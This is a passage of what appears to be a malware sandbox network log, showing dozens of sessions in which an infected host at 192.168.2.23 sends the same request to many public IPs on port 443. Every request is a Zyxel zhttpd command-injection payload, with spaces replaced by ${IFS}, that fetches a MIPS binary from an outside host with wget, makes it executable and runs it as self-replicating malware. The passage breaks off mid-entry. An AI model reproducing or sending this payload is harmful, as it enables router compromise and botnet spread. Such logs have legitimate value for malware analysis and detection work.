                                                744192.168.2.2343886143.229.27.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596085072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                745192.168.2.235802625.238.87.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596606016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                746192.168.2.2342448169.222.253.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596626997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                747192.168.2.2356836120.201.80.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596667051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                748192.168.2.2357692161.4.77.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596697092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                749192.168.2.235192257.145.95.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596741915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                750192.168.2.235281472.41.138.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596744061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                751192.168.2.2342556175.34.42.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596791029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                752192.168.2.234094817.228.247.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596818924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                753192.168.2.2341288128.94.64.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596859932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                754192.168.2.233900881.86.105.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596870899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                755192.168.2.23496864.8.143.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596895933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                756192.168.2.23564508.149.254.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596937895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                757192.168.2.2349772151.175.233.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596976995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                758192.168.2.23520508.48.179.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.596995115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                759192.168.2.2345192124.124.24.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597006083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                760192.168.2.2358540180.151.86.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597033024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                761192.168.2.2359802152.108.129.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597052097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                762192.168.2.2333246133.162.205.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597094059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                763192.168.2.234159297.176.94.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597110033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                764192.168.2.234950694.127.203.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597146034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                765192.168.2.2351632138.180.163.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597151041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                766192.168.2.2348820183.234.11.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597208023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                767192.168.2.2342158212.62.4.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597220898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                768192.168.2.234397662.119.209.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597237110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                769192.168.2.2347626108.18.252.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.597273111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                770192.168.2.234591039.121.10.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.597997904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                771192.168.2.2355166166.68.17.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598035097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                772192.168.2.235563251.35.153.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598038912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                773192.168.2.234359443.214.136.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598073959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                774192.168.2.2351878212.243.12.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598143101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                775192.168.2.234211074.191.70.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598157883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                776192.168.2.2340178183.173.152.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598184109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                777192.168.2.234729265.213.207.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598203897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                778192.168.2.2350370132.105.216.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598234892 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                779192.168.2.234805219.124.87.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598297119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                780192.168.2.2353874163.2.11.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598315954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                781192.168.2.234082893.206.87.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598360062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                782192.168.2.2335436180.78.101.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598395109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                783192.168.2.2359066222.20.130.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598433971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                784192.168.2.2336572169.15.165.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598454952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                785192.168.2.235710012.5.22.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598462105 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                786192.168.2.2353472190.52.113.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598519087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                787192.168.2.235582492.32.16.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598543882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                788192.168.2.234073096.254.97.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598577976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                789192.168.2.2343374139.130.45.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598598003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                790192.168.2.234826839.44.233.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598632097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                791192.168.2.2360006181.54.232.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598664045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                792192.168.2.2334596121.179.167.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598680019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                793192.168.2.2356954190.153.57.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598726034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                794192.168.2.2339726200.185.144.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598769903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                795192.168.2.2333484207.209.68.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598805904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                796192.168.2.234045261.206.139.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598855972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                797192.168.2.234263050.76.156.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598902941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                798192.168.2.2350382194.204.42.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598928928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                799192.168.2.235558447.128.121.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598953009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                800192.168.2.235691835.115.197.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.598970890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                801192.168.2.2355234133.227.2.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599004984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                802192.168.2.233412693.144.53.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599041939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                803192.168.2.2335134160.55.44.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599116087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                804192.168.2.2359656157.225.126.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599148989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                805192.168.2.2338942220.216.68.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:11.599164009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                806192.168.2.235264278.214.73.81443
                                                TimestampBytes transferredDirectionData
